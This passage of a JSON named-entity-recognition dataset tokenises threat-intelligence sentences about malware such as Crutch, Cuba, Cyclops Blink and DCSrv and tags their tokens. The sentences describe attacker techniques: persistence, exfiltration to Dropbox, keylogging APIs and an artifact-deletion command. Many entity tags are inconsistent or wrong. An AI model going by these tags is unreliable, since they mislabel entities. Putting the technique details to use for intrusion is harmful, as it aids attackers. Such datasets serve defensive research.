"B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "add", - "Registry", - "run", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "spread", - "across", - "systems", - "by", - "infecting", - "removable", - "media." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "perform", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "collect", - "information", - "about", - "anti-virus", - "software", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "collect", - "the", - "victim", - "PC", - "name,", - "disk", - "drive", - "information,", - "and", - "operating", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "identify", - "the", - "geographical", - "location", - "of", - "a", - "victim", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "collect", - "the", - "victim", - "MAC", - "address", - "and", - "LAN", - "IP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "identify", - "the", - "user", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "has", - "the", - "ability", - "to", - "determine", - "the", - "date", - "and", - "time", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "determine", - "when", - "it", - "has", - "been", - "installed", - "on", - "a", - "host", - "for", - "at", - "least", - "15", - "days", - "before", - "downloading", - "the", - "final", - "payload." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "capture", - "webcam", - "video", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "use", - "a", - "HTTP", - "GET", - "request", - "to", - "download", - "its", - "final", - "payload." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "has", - "the", - "ability", - "to", - "execute", - "commands", - "with", - "the", - "COMSPEC", - "environment", - "variable." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrossRAT", - "can", - "list", - "all", - "files", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrossRAT", - "creates", - "a", - "Launch", - "Agent", - "on", - "macOS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "CrossRAT", - "uses", - "run", - "keys", - "for", - "persistence", - "on", - "Windows." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrossRAT", - "is", - "capable", - "of", - "taking", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "CrossRAT", - "can", - "use", - "an", - "XDG", - "Autostart", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "used", - "the", - "WinRAR", - "utility", - "to", - "compress", - "and", - "encrypt", - "stolen", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "automatically", - "monitor", - "removable", - "drives", - "in", - "a", - "loop", - "and", - "copy", - "interesting", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "automatically", - "exfiltrated", - "stolen", - "files", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "use", - "Dropbox", - "to", - "receive", - "commands", - "and", - "upload", - "stolen", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "persist", - "via", - "DLL", - "search", - "order", - "hijacking", - "on", - "Google", - "Chrome,", - "Mozilla", - "Firefox,", - "or", - "Microsoft", - "OneDrive." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "exfiltrate", - "files", - "from", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "monitor", - "removable", - "drives", - "and", - "exfiltrate", - "files", - "matching", - "a", - "given", - "extension", - "list." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "exfiltrate", - "data", - "over", - "the", - "primary", - "C2", - "channel", - "(Dropbox", - "HTTP", - "API)." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "used", - "a", - "hardcoded", - "GitHub", - "repository", - "as", - "a", - "fallback", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "staged", - "stolen", - "files", - "in", - "the", - "<code>C:\\AMD\\Temp</code>", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "established", - "persistence", - "with", - "a", - "scheduled", - "task", - "impersonating", - "the", - "Outlook", - "item", - "finder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "can", - "monitor", - "for", - "removable", - "drives", - "being", - "plugged", - "into", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "the", - "ability", - "to", - "persist", - "using", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Crutch", - "has", - "conducted", - "C2", - "communications", - "with", - "a", - "Dropbox", - "account", - "using", - "the", - "HTTP", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cryptoistic", - "can", - "retrieve", - "files", - "from", - "the", - "local", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "can", - "engage", - "in", - "encrypted", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "has", - "the", - "ability", - "delete", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "can", - "scan", - "a", - "directory", - "to", - "identify", - "files", - "for", - "deletion." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "has", - "the", - "ability", - "to", - "send", - "and", - "receive", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "can", - "use", - "TCP", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptoistic", - "can", - "gather", - "data", - "on", - "the", - "user", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "used", - "<code>SeDebugPrivilege</code>", - "and", - "<code>AdjustTokenPrivileges</code>", - "to", - "elevate", - "privileges." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "the", - "ability", - "to", - "encrypt", - "system", - "data", - "and", - "add", - "the", - "\".cuba\"", - "extension", - "to", - "encrypted", - "files." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "use", - "the", - "command", - "<code>cmd.exe", - "/c", - "del</code>", - "to", - "delete", - "its", - "artifacts", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "enumerate", - "files", - "by", - "using", - "a", - "variety", - "of", - "functions." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "executed", - "hidden", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "download", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "logs", - "keystrokes", - "via", - "polling", - "by", - "using", - "<code>GetKeyState</code>", - "and", - "<code>VkKeyScan</code>", - "functions." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "been", - "disguised", - "as", - "legitimate", - "360", - "Total", - "Security", - "Antivirus", - "and", - "OpenVPN", - "programs." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "used", - "several", - "built-in", - "API", - "functions", - "for", - "discovery", - "like", - "GetIpNetTable", - "and", - "NetShareEnum." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "discover", - "shared", - "resources", - "using", - "the", - "<code>NetShareEnum</code>", - "API", - "call." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "used", - "multiple", - "layers", - "of", - "obfuscation", - "to", - "avoid", - "analysis,", - "including", - "its", - "Base64", - "encoded", - "payload." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "been", - "dropped", - "onto", - "systems", - "and", - "used", - "for", - "lateral", - "movement", - "via", - "obfuscated", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "enumerate", - "processes", - "running", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "loaded", - "the", - "payload", - "into", - "memory", - "using", - "PowerShell." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "a", - "hardcoded", - "list", - "of", - "services", - "and", - "processes", - "to", - "terminate." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "a", - "packed", - "payload", - "when", - "delivered." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "enumerate", - "local", - "drives,", - "disk", - "type,", - "and", - "disk", - "free", - "space." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-SamFile", - "I-Features", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "check", - "if", - "Russian", - "language", - "is", - "installed", - "on", - "the", - "infected", - "machine", - "by", - "using", - "the", - "function", - "<code>GetKeyboardLayoutList</code>." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "retrieve", - "the", - "ARP", - "cache", - "from", - "the", - "local", - "system", - "by", - "using", - "<code>GetIpNetTable</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "use", - "the", - "function", - "<code>GetIpNetTable</code>", - "to", - "recover", - "the", - "last", - "connections", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "query", - "service", - "status", - "using", - "<code>QueryServiceStatusEx</code>", - "function." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "has", - "used", - "<code>cmd.exe", - "/c</code>", - "and", - "batch", - "files", - "for", - "execution." - ], - "ner_tags": [ - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cuba", - "can", - "modify", - "services", - "by", - "using", - "the", - "<code>OpenService</code>", - "and", - "<code>ChangeServiceConfig</code>", - "functions." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "encrypt", - "C2", - "messages", - "with", - "AES-256-CBC", - "sent", - "underneath", - "TLS.", - "OpenSSL", - "library", - "functions", - "are", - "also", - "used", - "to", - "encrypt", - "each", - "message", - "using", - "a", - "randomly", - "generated", - "key", - "and", - "IV,", - "which", - "are", - "then", - "encrypted", - "using", - "a", - "hard-coded", - "RSA", - "public", - "key." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "maintained", - "persistence", - "by", - "patching", - "legitimate", - "device", - "firmware", - "when", - "it", - "is", - "downloaded,", - "including", - "that", - "of", - "WatchGuard", - "devices." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "decrypt", - "and", - "parse", - "instructions", - "sent", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "modify", - "the", - "Linux", - "iptables", - "firewall", - "to", - "enable", - "C2", - "communication", - "on", - "network", - "devices", - "via", - "a", - "stored", - "list", - "of", - "port", - "numbers." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "upload", - "exfiltrated", - "files", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "the", - "Linux", - "API", - "`statvfs`", - "to", - "enumerate", - "the", - "current", - "working", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "target", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "create", - "a", - "pipe", - "to", - "enable", - "inter-process", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "rename", - "its", - "running", - "process", - "to", - "<code>[kworker:0/1]</code>", - "to", - "masquerade", - "as", - "a", - "Linux", - "kernel", - "thread.", - "Cyclops", - "Blink", - "has", - "also", - "named", - "RC", - "scripts", - "used", - "for", - "persistence", - "after", - "WatchGuard", - "artifacts." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "used", - "Tor", - "nodes", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "various", - "Linux", - "API", - "functions", - "including", - "those", - "for", - "execution", - "and", - "discovery." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "a", - "custom", - "binary", - "scheme", - "to", - "encode", - "messages", - "with", - "specific", - "commands", - "and", - "parameters", - "to", - "be", - "executed." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "non-standard", - "ports", - "for", - "C2", - "not", - "typically", - "associated", - "with", - "HTTP", - "or", - "HTTPS", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "enumerate", - "the", - "process", - "it", - "is", - "currently", - "running", - "under." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "DNS", - "over", - "HTTPS", - "(DoH)", - "to", - "resolve", - "C2", - "nodes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "execute", - "on", - "device", - "startup,", - "using", - "a", - "modified", - "RC", - "script", - "named", - "S51armled." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "query", - "device", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "use", - "the", - "Linux", - "API", - "`if_nameindex`", - "to", - "gather", - "network", - "interface", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "has", - "the", - "ability", - "to", - "use", - "the", - "Linux", - "API", - "function", - "`utime`", - "to", - "change", - "the", - "timestamps", - "of", - "modified", - "firmware", - "update", - "images." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyclops", - "Blink", - "can", - "download", - "files", - "via", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "encrypted", - "drives", - "using", - "the", - "core", - "encryption", - "mechanism", - "from", - "DiskCryptor." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv's", - "configuration", - "is", - "encrypted." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "masqueraded", - "its", - "service", - "as", - "a", - "legitimate", - "svchost.exe", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "created", - "Registry", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "used", - "various", - "Windows", - "API", - "functions,", - "including", - "`DeviceIoControl`,", - "as", - "part", - "of", - "its", - "encryption", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "a", - "function", - "to", - "sleep", - "for", - "two", - "hours", - "before", - "rebooting", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv", - "can", - "compare", - "the", - "current", - "time", - "on", - "an", - "infected", - "host", - "with", - "a", - "configuration", - "value", - "to", - "determine", - "when", - "to", - "start", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DCSrv", - "has", - "created", - "new", - "services", - "for", - "persistence", - "by", - "modifying", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DDKONG", - "decodes", - "an", - "embedded", - "configuration", - "using", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DDKONG", - "lists", - "files", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DDKONG", - "downloads", - "and", - "uploads", - "files", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DDKONG", - "uses", - "Rundll32", - "to", - "ensure", - "only", - "a", - "single", - "instance", - "of", - "itself", - "is", - "running", - "at", - "once." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "has", - "the", - "ability", - "to", - "combine", - "multiple", - "sections", - "of", - "a", - "binary", - "which", - "were", - "broken", - "up", - "to", - "evade", - "detection", - "into", - "a", - "single", - ".dll", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DEADEYE.EMBED", - "variant", - "of", - "DEADEYE", - "has", - "the", - "ability", - "to", - "embed", - "payloads", - "inside", - "of", - "a", - "compiled", - "binary." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "has", - "encrypted", - "its", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "ensure", - "it", - "executes", - "only", - "on", - "intended", - "systems", 